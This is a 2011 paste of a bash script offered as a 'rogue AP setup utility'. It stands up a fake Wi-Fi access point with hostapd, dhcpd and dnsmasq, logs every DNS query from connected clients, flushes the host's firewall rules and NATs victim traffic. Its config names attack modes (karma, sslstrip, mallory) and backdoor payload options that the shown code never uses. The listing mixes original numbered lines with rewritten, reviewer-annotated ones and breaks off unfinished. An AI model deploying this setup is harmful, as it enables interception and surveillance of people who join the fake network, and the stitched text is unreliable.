ak47suk1

make your own ap

Oct 12th, 2011
  1. #!/bin/bash
  2. #y0-
  3.  
  4. # dependencies
  5. # sudo apt-get install dnsmasq hostapd dhcp3-server
  6.  
  version=0.1
  # Print the banner and the option summary to stdout (reads $version and $0).
  show_help() {
    printf '%s\n' \
      "A rogue AP setup utility v$version inspired from Airsnarf Shmoo. " \
      "Copyright (c) 2011 USIM Student Batch 2007-2011. All rights reserved" "" \
      "Usage:    $0  [options]" "Options:" \
      "-s    : show config" \
      "-r    : run this config" \
      "-h    : show this help message and exit"
  }
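  # Show the editable settings: prints this script's first 68 lines (header + config), so keep that block above line 68.
  show_config() {
    head -n 68 -- "$0"
  }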
  21.  
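  while (( $# > 0 )); do # only -r falls through to the setup below; -h and -s print and exit
    arg_name=$1; shift
    case "$arg_name" in
      -h) show_help; exit 0 ;;
      -s) show_config; exit 0 ;;
      -r) t=$arg_name; break ;;
      *) echo "invalid option: $arg_name"; show_help; exit 1 ;; # name the rejected argument; after shift, $1 is already the next one
    esac
  done
  [ "$t" != "-r" ] && { show_help; exit 1; } # no -r given: print usage instead of reconfiguring the host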
  32.  
  33.  
  34. ################################################
  35. # Here are some variables you may want to edit
  36. ################################################
  BMODE='non-bridge' # BMODE can be: bridge, non-bridge or karma
  MODE='simple'      # MODE can be: simple, mallory, sslstrip, captive, milk

  INET_IFACE='ppp0'         # uplink interface; the author lists ppp0 and tun0
  HOSTAP_WIFI_IFACE='wlan0' # tested by the author on ath5k/ath9k/rt73usb based cards
  BRIDGE_IFACE='br0'
  CHAN='7'
  SSID='mysabily.blogspot.com' # the SSID can be changed to any other name

  INET_GW='113.211.116.196' # set the external IP here (check it with whatismyipaddress.com); author's alternative: 10.8.0.6
  LAN_IP='192.168.2.1'
  NETMASK='255.255.255.0'
  SUBNET='192.168.2.0'
  NETWORK="${SUBNET}/24"
  BROADCAST_IP='192.168.2.255'
  DHCP_MIN='192.168.2.3'
  DHCP_MAX='192.168.2.254'
  RANGE_IP="${DHCP_MIN} ${DHCP_MAX}" # first and last address of the DHCP pool
  DOMAIN='usim.edu.my'
  OPTION_NETBIOS_NAME_SERVERS='192.168.2.252'
  ACL_LOCALNET_SRC='192.168.0.0/16'
  #OPDNS="208.67.222.220, 208.67.222.222, 4.2.2.1, 4.2.2.2, 208.67.216.132, 208.67.216.132"
  #OPDNS="8.8.8.8,8.8.4.4"
  OPDNS='58.71.136.10,58.71.132.10' # set the DNS servers here
  DNS="${INET_GW}, ${OPDNS}" # format: "YOUR ISP DNS SERVER, $OPDNS"; written into the DHCP and dnsmasq options further down
  #DNS="$OPDNS"

  payload='' # author's values: sbd/vnc/wkv/other ("other" takes /path/to/file); payload, backdoorPath and port are not referenced in the listing shown
  backdoorPath='/tmp/backdoor.exe'
  port=$(shuf -i 2000-65000 -n 1)
  67.  
  68.  
  69.  
  70.  
  71.  
  72.  
  73.  
  74.  
  75.  
  76.  
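  echo "----------------------------------------------------------------------"
  echo "A rogue AP setup utility v$version inspired from Airsnarf Shmoo. "
  echo "Copyright (c) 2011 USIM Student Batch 2007-2011. All rights reserved"
  echo "----------------------------------------------------------------------"

  # Connectivity check: send one ICMP echo to google.com through the uplink
  # interface. `command` receives the fourth field of ping's "64 bytes from"
  # reply line and stays empty when no reply arrived, in which case the script
  # stops before touching any network configuration.
  echo "[*] Testing internet connection..."
  command=$(ping -I "$INET_IFACE" -c 1 google.com | grep "64 bytes from" | cut -d' ' -f 4)
  # Quoted so the test stays a two-argument `-z` check whatever ping printed.
  if [ -z "$command" ]; then
    echo "[!] Internet access failed. "
    exit 1
  fi
  echo "[-] Got internet access..."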
  85.  
  # Working directory for the generated dhcpd.conf, dnsmasq.conf and dnsmasq.log:
  # ./tmp below the directory the script is started from.
  HOME_DIR="$PWD/tmp"
  mkdir -p "$HOME_DIR/"
  88.  
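  # Create the hostapd.conf
  #
  # The generated file holds the WPA passphrase in clear text, and the text
  # written into it says it must not be readable by anyone but root. The
  # directory is therefore forced to 0700 and the file is created under
  # umask 077. /tmp is world-writable, so the script refuses to continue when
  # /tmp/hostapd is a symlink or already belongs to another user.
  # The passphrase itself is a fixed value embedded below; change it before use.
  hostapd_dir=/tmp/hostapd
  hostapd_conf=$hostapd_dir/hostapd.conf
  if [ -L "$hostapd_dir" ] || { [ -e "$hostapd_dir" ] && [ ! -O "$hostapd_dir" ]; }; then
    echo "[!] $hostapd_dir is a symlink or belongs to another user; not writing the key there." >&2
    exit 1
  fi
  if ! mkdir -p "$hostapd_dir" || ! chmod 700 "$hostapd_dir"; then
    echo "[!] Cannot prepare $hostapd_dir" >&2
    exit 1
  fi
  # Stale config and pid file from an earlier run; absence is not an error.
  rm -f -- "$hostapd_conf" "$hostapd_dir/hostapd.pid"

  saved_umask=$(umask)
  umask 077
  cat > "$hostapd_conf" << EOF
driver=nl80211
logger_syslog=-1
logger_syslog_level=2
logger_stdout=-1
logger_stdout_level=1
ssid=$SSID
hw_mode=g
channel=$CHAN
beacon_int=100
dtim_period=2
max_num_sta=255
rts_threshold=2347
fragm_threshold=2346
macaddr_acl=0
auth_algs=3
ignore_broadcast_ssid=0
#wmm_enabled=1
eapol_key_index_workaround=0
eap_server=0
own_ip_addr=127.0.0.1
# WPA settings. We'll use stronger WPA2
# bit0 = WPA
# bit1 = IEEE 802.11i/RSN (WPA2) (dot11RSNAEnabled)
wpa=2

# Preshared key of between 8-63 ASCII characters.
# If you define the key in here, make sure that the file is not readable
# by anyone but root. Alternatively you can use a separate file for the
# key; see original hostapd.conf for more information.
# Set WPA key di sini
wpa_passphrase=passwordaku

# Key management algorithm. In this case, a simple pre-shared key (PSK)
wpa_key_mgmt=WPA-PSK

# The cipher suite to use. We want to use stronger CCMP cipher.
wpa_pairwise=CCMP

# Change the broadcasted/multicasted keys after this many seconds.
wpa_group_rekey=600

# Change the master key after this many seconds. Master key is used as a basis
# (source) for the encryption keys.
wpa_gmk_rekey=86400

interface=$HOSTAP_WIFI_IFACE
EOF
  umask "$saved_umask"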
  143.  
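  # Overwrite /etc/default/dhcp3-server with an empty INTERFACES list. This
  # replaces the distribution's file; nothing here backs it up first.
  echo "INTERFACES=\"\"" > /etc/default/dhcp3-server

  if [ "$BMODE" == "non-bridge" ]; then
    # Bounce the wireless interface, assign it the LAN address and add the
    # route for the wireless subnet.
    ifconfig "$HOSTAP_WIFI_IFACE" down && sleep 2
    ifconfig "$HOSTAP_WIFI_IFACE" up && sleep 2
    ifconfig "$HOSTAP_WIFI_IFACE" "$LAN_IP" netmask "$NETMASK"
    route add -net "$SUBNET" netmask "$NETMASK" gw "$LAN_IP"

    echo -e "[*] Starting DHCP Server.. "

    # Create custom dhcpd.conf; it is rebuilt from scratch on every run.
    path="$HOME_DIR/dhcpd.conf"
    rm -f -- "$path"
    echo -e "#
ddns-update-style none;
ignore client-updates; # Ignore all client requests for DDNS update
authoritative;
default-lease-time 86400; # 24 hours
max-lease-time 172800;    # 48 hours
log-facility local7;\n
subnet $SUBNET netmask $NETMASK {
range $RANGE_IP;
option routers $LAN_IP;
option subnet-mask $NETMASK;
option broadcast-address  $BROADCAST_IP;
option domain-name \"$DOMAIN\"; " >> "$path"

    echo " option domain-name-servers $DNS;" >> "$path"
    #echo " option domain-name-servers $LAN_IP;" >> $path # non-transparent variant

    echo -e " option netbios-name-servers $OPTION_NETBIOS_NAME_SERVERS;\n}" >> "$path"

    # Install the generated file system-wide and start dhcpd3 on the wireless
    # interface. rm -f: a missing pid file from a previous run is not an error.
    cp -- "$HOME_DIR/dhcpd.conf" /etc/dhcp3/dhcpd.conf
    rm -f /var/run/dhcpd.pid
    ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
    dhcpd3 -cf /etc/dhcp3/dhcpd.conf "$HOSTAP_WIFI_IFACE" -pf /var/run/dhcpd.pid

    echo -e "[*] Starting DNS forwarder... "

    path="$HOME_DIR/dnsmasq.conf"
    rm -f -- "$path"
    # LAN_IFACE is not assigned anywhere in the listing shown, which left
    # "interface=" empty. Fall back to the wireless interface, which carries
    # LAN_IP in this branch. NOTE(review): presumably the intended value;
    # confirm against the author's original.
    echo -e "#
interface=${LAN_IFACE:-$HOSTAP_WIFI_IFACE}
domain=$DOMAIN
#dhcp-range=$DHCP_MIN,$DHCP_MAX,24h
#dhcp-authoritative
#dhcp-option=3,$LAN_IP # Gateway" >> "$path"
    #echo -e "dhcp-option=6,$LAN_IP # DNS" >> $path # non-transparent variant
    echo -e "dhcp-option=6,$DNS # DNS" >> "$path"
  fi
  # NOTE(review): the branch above ends here, yet the statements below still
  # use $path and start dnsmasq. With any other BMODE, $path is unset at this
  # point and the dnsmasq.conf was never written.
  # log-queries makes dnsmasq record every DNS lookup made by connected
  # clients in $HOME_DIR/dnsmasq.log.
  echo -e "log-queries
#log-dhcp
log-facility=$HOME_DIR/dnsmasq.log" >> "$path"

  # Start the DNS forwarder in the background.
  dnsmasq -C "$HOME_DIR/dnsmasq.conf" &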
  199.  
  200. ##########################################################################
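  201. # Simple WLAN setup (clients can access Internet). Note: this branch first flushes every existing iptables rule and deletes every user-defined chain in the filter and nat tables, then enables IP forwarding; the closing `fi` for it is not present in this paste.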
  202. if [ $MODE = "simple" ];then echo -e "[*] Starting simple WLAN setup...."
  203. iptables --flush
  204. iptables --table nat --flush
  205. iptables --delete-chain
  206. iptables --table nat --delete-chain
  207.  
  208. iptables -t nat -A POSTROUTING -o $INET_IFACE -j MASQUERADE
  209. iptables -A FORWARD -i $HOSTAP_WIFI_IFACE -j ACCEPT
  210. iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $INET_GW
  211.  
  212. echo 1 > /proc/sys/net/ipv4/ip_forward
  213. sleep 1
  214.  
  215. /etc/init.d/dhcp3-server restart > /dev/null 2>&1
  216. sleep 1
  217.  
  218. echo "Starting AP..."
  219. hostapd -dd -P /tmp/hostapd/hostapd.pid /tmp/hostapd/hostapd.conf
  220.  